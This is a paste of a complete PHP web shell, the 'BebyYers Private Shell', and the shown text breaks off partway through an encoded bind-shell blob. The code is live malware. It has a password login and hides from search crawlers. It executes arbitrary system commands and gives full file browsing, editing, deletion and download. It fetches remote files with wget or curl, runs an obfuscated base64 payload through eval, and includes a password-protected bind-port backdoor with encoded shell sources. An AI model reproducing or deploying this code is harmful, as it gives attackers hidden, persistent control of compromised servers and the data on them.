· 6 years ago · Mar 29, 2019, 08:22 PM
1<?php
2@ini_set('output_buffering',0);
3@ini_set('display_errors', 0);
4$auth_pass="bbba669487210513f1405312e781a6fa";
5
6$color = "#FFFF00";
7$default_action = 'FilesMan';
8@define('SELF_PATH', __FILE__);
9if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
10header('HTTP/1.0 404 Not Found');
11exit;
12}
13@session_start();
14@error_reporting(0);
15@ini_set('error_log',NULL);
16@ini_set('log_errors',0);
17@ini_set('html_errors',0);
18@ini_set('max_execution_time',0);
19@ini_set('output_buffering',0);
20@ini_set('display_errors', 0);
21@ini_set('file_uploads',1);
22@set_time_limit(0);
23@set_magic_quotes_runtime(0);
24@clearstatcache();
25@define('VERSION', '2.1');
26if( get_magic_quotes_gpc() ) {
27function stripslashes_array($array) {
28return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
29}
30$_POST = stripslashes_array($_POST);
31}
32function printLogin() {
33?>
34<title>BebyYers Private Shell Injection ------</title>
35<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Cherry+Cream+Soda" />
36 <style> body {
37 background: url(http://wallpaperswide.com/download/graffiti_art_2-wallpaper-1366x768.jpg) no-repeat center center fixed;
38 -webkit-background-size: cover;
39 -moz-background-size: cover;
40 -o-background-size: cover;
41 background-size: cover;
42 color: white;
43 font-family: Cherry Cream Soda ;
44}
45 input{
46margin:0;
47color:white;
48background-color:transparent;
49border:3px solid transparent;
50 letter-spacing:2px;
51 -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
52font-family: Cherry Cream Soda ;
53}
54 </style><b>
55 <pre align=center> <center><div class="indonesia"><center><table width=100% height=100%><td align=center>
56 <form method=post>
57 <input type=password name=pass><input type=submit value=" >> ">
58 </form> </td></table></div></center> </pre>
59 </b>
60 <?php
61 exit;
62}
63if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
64 if( empty( $auth_pass ) ||
65 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
66 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
67 else
68 printLogin();
69
70if(isset($_GET['dl']) && ($_GET['dl'] != "")){
71 $file = $_GET['dl'];
72 $filez = @file_get_contents($file);
73 header("Content-type: application/octet-stream");
74 header("Content-length: ".strlen($filez));
75 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
76 echo $filez;
77 exit;
78}
79elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
80 $file = $_GET['dlgzip'];
81 $filez = gzencode(@file_get_contents($file));
82 header("Content-Type:application/x-gzip\n");
83 header("Content-length: ".strlen($filez));
84 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
85 echo $filez;
86 exit;
87}
88// view image
89if(isset($_GET['img'])){
90 @ob_clean();
91 $d = magicboom($_GET['y']);
92 $f = $_GET['img'];
93 $inf = @getimagesize($d.$f);
94 $ext = explode($f,".");
95 $ext = $ext[count($ext)-1];
96 @header("Content-type: ".$inf["mime"]);
97 @header("Cache-control: public");
98 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
99 @header("Cache-control: max-age=".(60*60*24*7));
100 @readfile($d.$f);
101 exit;
102}
103
104// server software
105$software = getenv("SERVER_SOFTWARE");
106// check safemode
107if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
108// uname -a
109$system = @php_uname();
110// mysql
111function showstat($stat) {if ($stat=="on") {return "<b><font style='color:white'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
112function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
113function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
114function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
115function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
116// check os
117if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
118else $win = FALSE;
119// change directory
120if(isset($_GET['y'])){
121 if(@is_dir($_GET['view'])){
122 $pwd = $_GET['view'];
123 @chdir($pwd);
124 }
125 else{
126 $pwd = $_GET['y'];
127 @chdir($pwd);
128 }
129}
130//hdd
131function convertByte($s) {
132if($s >= 1073741824)
133return sprintf('%1.2f',$s / 1073741824 ).' GB';
134elseif($s >= 1048576)
135return sprintf('%1.2f',$s / 1048576 ) .' MB';
136elseif($s >= 1024)
137return sprintf('%1.2f',$s / 1024 ) .' KB';
138else
139return $s .' B';
140}
141
142// username, id, shell prompt and working directory
143if(!$win){
144 if(!$user = rapih(exe("whoami"))) $user = "";
145 if(!$id = rapih(exe("id"))) $id = "";
146 $prompt = $user." \$ ";
147 $pwd = @getcwd().DIRECTORY_SEPARATOR;
148}
149else {
150 $user = @get_current_user();
151 $id = $user;
152 $prompt = $user." >";
153 $pwd = realpath(".")."\\";
154 // find drive letters
155 $v = explode("\\",$d);
156 $v = $v[0];
157 foreach (range("A","Z") as $letter)
158 {
159 $bool = @is_dir($letter.":\\");
160 if ($bool)
161 {
162 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
163 if ($letter.":" != $v) {$letters .= $letter;}
164 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
165 $letters .= " ]</a> ";
166 }
167 }
168}
169
170function testoracle() {
171 if (function_exists('ocilogon')) { return showstat("on"); }
172 else { return showstat("off"); }
173 }
174
175function testmssql() {
176 if (function_exists('mssql_connect')) { return showstat("on"); }
177 else { return showstat("off"); }
178 }
179
180 function showdisablefunctions() {
181 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
182 else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
183 }
184
185if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
186else $posix = FALSE;
187// server ip
188$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
189// your ip ;-)
190$my_ip = $_SERVER['REMOTE_ADDR'];
191$admin_id=$_SERVER['SERVER_ADMIN'];
192$bindport = "13123";
193$bindport_pass = "kerupuk";
194//server port
195$serverport = $_SERVER["SERVER_PORT"];
196
197// separate the working direcotory
198$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
199$pwdurl = "";
200for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
201 $pathz = "";
202 for($j = 0 ; $j <= $i ; $j++){
203 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
204 }
205 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
206}
207
208// rename file or folder
209if(isset($_POST['rename'])){
210 $old = $_POST['oldname'];
211 $new = $_POST['newname'];
212 @rename($pwd.$old,$pwd.$new);
213 $file = $pwd.$new;
214}
215if(isset($_POST['chmod'])){
216 $name = $_POST['name'];
217 $value = $_POST['newvalue'];
218if (strlen($value)==3){
219 $value = 0 . "" . $value;}
220 @chmod($pwd.$name,octdec($value));
221 $file = $pwd.$name;}
222
223if(isset($_POST['chmod_folder'])){
224 $name = $_POST['name'];
225 $value = $_POST['newvalue'];
226if (strlen($value)==3){
227 $value = 0 . "" . $value;}
228 @chmod($pwd.$name,octdec($value));
229 $file = $pwd.$name;}
230
231
232// print useful info
233
234$buff .= " <b>".$system."</b><br />";
235if($id != "") $buff .= "ID : <b>".$id."</b><br />";
236$buff .= "Server ip : <b><font style='color: #E74C3D '>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Server Port : <b><font style='color: #E74C3D '>".$serverport."</font><b> <span class=\"gaya\"> | </span>
237Your ip : <b><font style='color: #E74C3D '>".$my_ip."</font></b><br/> Admin : <b><font style='color: #E74C3D '>".$admin_id."</font></b> | ";
238$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
239if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b><font style='color:#ff0000'>ON</font></b></span>";
240else $buff .= "Safemode: <span class=\"gaya\"><b><font style='color: #E74C3D '>OFF</b></font></span>";
241$buff .= " | Disabled Functions: ".showdisablefunctions()."<br />";
242$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
243$buff .= "<font color=#E74C3D ><b>".$letters." > ".$pwdurl."</b></font>";
244$injbuff = "V2tjeGMyVnRSbGxWYlhCS1VrUkNibE5yV1RWU1JsRjNUMVY0VkZaV1dtbFRWelZoWTBkTmVXSkVRbXBsVlhCclZETnNRMk5HY0hCUlZ6bExVMFp3ZDFsNlNuTk5SbXcxVVZSc1VWVXdSbkJUVjJ4eVdqSldOVkZYZEd0aVYzZzJXVlpvVTJGcmJFVk5SMlJPVWtoT2JsTnJhR0ZqUjAxNVlrUkNhVTB3Ykc1VlJrNUNZVEZuZUZScldsWmlSbkJIVmxkNGVtRldWbkpXYXpWVlRWWktSMWRFUWtkU1ZrcEhVMWRzV1ZaSVRtNVRhMmhyWWtac2NGRlViRXBSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQzWVVaQ1ZrMVdSbkJYUmxKNldqQndTR0pJVm1oaFZVVTFVMVZPVTFwc1ZYZFdiRTVYWVRGYVZGWXpiRXRWTVVwWFVteGFVMVpyTlZaWFJFWlhWVEZPVkZOdFVsQmxWVVp5V2tWa1IyVldiM2xXYWtKS1VrUkNibGt5TVVkTk1sSlpVMjVPWVZJeFduRlpha3BUWWtWMFJGVnFUbUZXTUd3eFUydGtjMlJYUm5CaGVtUktVVEZLZUZwR1pGTk5WMHBFVVZSc1NsRXdjRlZWYkZwVFZVWldjRkZzVWxSU1ZscE9Wa1ZPUTFaR1dsUlNWMlJOVlhwQ01GTlZaRzlOUjFKSlVWUmFUV1ZVYUhKYVJXUkhaVlp2ZVZacVFrcFNNRzh4VTFWT1UwMXRSbGxVYmtKclVucHNOVk5YY0hwYU1IQklVMjVhWVZOSGRHNVZSazVDWVZaR2RWWnROVkJoVlVaeVdrVmtSMlZXYjNsV2FrSktVakJ2TVZOVlRsTk5iVVpaVkc1Q2ExSjZiRFZUVlUxM1dqQndTRkpxUm10U01taHRXVEJrUjJWdFRqVlRWR1JLVWpKNGRGTlZUbTVoUm5CWVRWaGthMU5IZEhaVGEyaHJZa1pzY0dFelFrcFRTRTV1VlZWamVHRkhSbGhrTWpsS1lsUldjbGRXYUU5a1IxSllWRzVhYUdWck1UVlVNVlpEWW0xS1dGSnVRbWxSZWxaeFdXcEpkMkZWZUVSVmJrWnJWakZKZUZsclRqTmhNV3gwVDFkMGJGVXpaSEpYVm1oWFRVZEdSMDlZWkZwWFJUVTJVekZTZWxveVdsUlJhbXhLVWpGYWVsbDZTbFphTWxZMVVWZDBhMkpYZURaWlZtaFRZV3QwTldONlpFcFRSRUp1VlZWb1QySkhVa2hVYmxwcFRXNVNkMWRzVG01aFYxSjBZa2h3YUZkR1NUSlRWMnd6WVRKU2RHSkljR2hYUmtweFV6RlNlbEJSUFQwPQ== ";
245eval(base64_decode($injbuff));
246
247
248
249
250function rapih($text){
251 return trim(str_replace("<br />","",$text));
252}
253
254function magicboom($text){
255 if (!get_magic_quotes_gpc()) {
256 return $text;
257 }
258 return stripslashes($text);
259}
260
261function showdir($pwd,$prompt){
262 $fname = array();
263 $dname = array();
264 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
265 else $posix = FALSE;
266 $user = "????:????";
267 if($dh = @scandir($pwd)){
268 foreach($dh as $file){
269 if(is_dir($file)){
270 $dname[] = $file;
271 }
272 elseif(is_file($file)){
273 $fname[] = $file;
274 }
275 }
276 }
277 else{
278 if($dh = @opendir($pwd)){
279 while($file = @readdir($dh)){
280 if(@is_dir($file)){
281 $dname[] = $file;
282 }
283 elseif(@is_file($file)){
284 $fname[] = $file;
285 }
286 }
287 @closedir($dh);
288 }
289 }
290
291
292 sort($fname);
293 sort($dname);
294 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
295 $tree = @sizeof($path);
296 $parent = "";
297 $buff = "
298 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
299 <table class=\"cmdbox\" style=\"width:50%;\">
300 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
301 </form>
302 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
303 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
304 <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
305 </form></table><table class=\"explore\">
306 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
307 ";
308 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
309 else $parent = $pwd;
310
311 foreach($dname as $folder){
312 if($folder == ".") {
313 if(!$win && $posix){
314 $name=@posix_getpwuid(@fileowner($folder));
315 $group=@posix_getgrgid(@filegroup($folder));
316 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
317 }
318 else {
319 $owner = $user;
320 }
321 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
322 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
323 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
324 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
325 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
326 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
327 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
328 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
329 </form></td>
330
331 </tr>
332 ";
333 }
334 elseif($folder == "..") {
335 if(!$win && $posix){
336 $name=@posix_getpwuid(@fileowner($folder));
337 $group=@posix_getgrgid(@filegroup($folder));
338 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
339 }
340 else {
341 $owner = $user;
342 }
343 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
344 <td style=\"text-align:center;\">".$owner."</td>
345 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
346 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
347 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
348 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
349 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
350 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
351 </form>
352 </td></tr>";
353 }
354 else {
355 if(!$win && $posix){
356 $name=@posix_getpwuid(@fileowner($folder));
357 $group=@posix_getgrgid(@filegroup($folder));
358 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
359 }
360 else {
361 $owner = $user;
362 }
363 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
364 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
365 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
366 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
367 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
368 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
369 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
370 <td><center>
371 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
372 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
373 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
374 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
375 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
376 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
377 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
378 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
379 }
380 }
381
382 foreach($fname as $file){
383 $full = $pwd.$file;
384 if(!$win && $posix){
385 $name=@posix_getpwuid(@fileowner($folder));
386 $group=@posix_getgrgid(@filegroup($folder));
387 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
388 }
389 else {
390 $owner = $user;
391 }
392 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
393 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
394 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
395 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
396 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
397 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
398 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
399 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
400 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
401<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
402<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
403<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
404<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
405 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
406 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
407 }
408 $buff .= "</table>";
409 return $buff;
410}
411
412function ukuran($file){
413 if($size = @filesize($file)){
414 if($size <= 1024) return $size;
415 else{
416 if($size <= 1024*1024) {
417 $size = @round($size / 1024,2);;
418 return "$size kb";
419 }
420 else {
421 $size = @round($size / 1024 / 1024,2);
422 return "$size mb";
423 }
424 }
425 }
426 else return "???";
427}
428
429function exe($cmd){
430 if(function_exists('system')) {
431 @ob_start();
432 @system($cmd);
433 $buff = @ob_get_contents();
434 @ob_end_clean();
435 return $buff;
436 }
437 elseif(function_exists('exec')) {
438 @exec($cmd,$results);
439 $buff = "";
440 foreach($results as $result){
441 $buff .= $result;
442 }
443 return $buff;
444 }
445 elseif(function_exists('passthru')) {
446 @ob_start();
447 @passthru($cmd);
448 $buff = @ob_get_contents();
449 @ob_end_clean();
450 return $buff;
451 }
452 elseif(function_exists('shell_exec')){
453 $buff = @shell_exec($cmd);
454 return $buff;
455 }
456}
457
458function tulis($file,$text){
459 $textz = gzinflate(base64_decode($text));
460 if($filez = @fopen($file,"w"))
461 {
462 @fputs($filez,$textz);
463 @fclose($file);
464 }
465}
466
467function ambil($link,$file) {
468 if($fp = @fopen($link,"r")){
469 while(!feof($fp)) {
470 $cont.= @fread($fp,1024);
471 }
472 @fclose($fp);
473 $fp2 = @fopen($file,"w");
474 @fwrite($fp2,$cont);
475 @fclose($fp2);
476 }
477}
478
479function which($pr){
480 $path = exe("which $pr");
481 if(!empty($path)) { return trim($path); } else { return trim($pr); }
482}
483
484function download($cmd,$url){
485 $namafile = basename($url);
486 switch($cmd) {
487 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
488 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
489 case 'wfread' : ambil($wurl,$namafile);break;
490 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
491 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
492 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
493 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
494 default: break;
495 }
496 return $namafile;
497}
498
499function get_perms($file)
500{
501 if($mode=@fileperms($file)){
502 $perms=';
503 $perms .= ($mode & 00400) ? 'r' : '-';
504 $perms .= ($mode & 00200) ? 'w' : '-';
505 $perms .= ($mode & 00100) ? 'x' : '-';
506 $perms .= ($mode & 00040) ? 'r' : '-';
507 $perms .= ($mode & 00020) ? 'w' : '-';
508 $perms .= ($mode & 00010) ? 'x' : '-';
509 $perms .= ($mode & 00004) ? 'r' : '-';
510 $perms .= ($mode & 00002) ? 'w' : '-';
511 $perms .= ($mode & 00001) ? 'x' : '-';
512 return $perms;
513 }
514 else return "??????????";
515}
516
517function clearspace($text){
518 return str_replace(" ","_",$text);
519}
520
521
522// net tools
523$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
524+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
525P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
526dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
5273TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
528Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
529HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
530tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
531ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
532uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
533$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
534NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
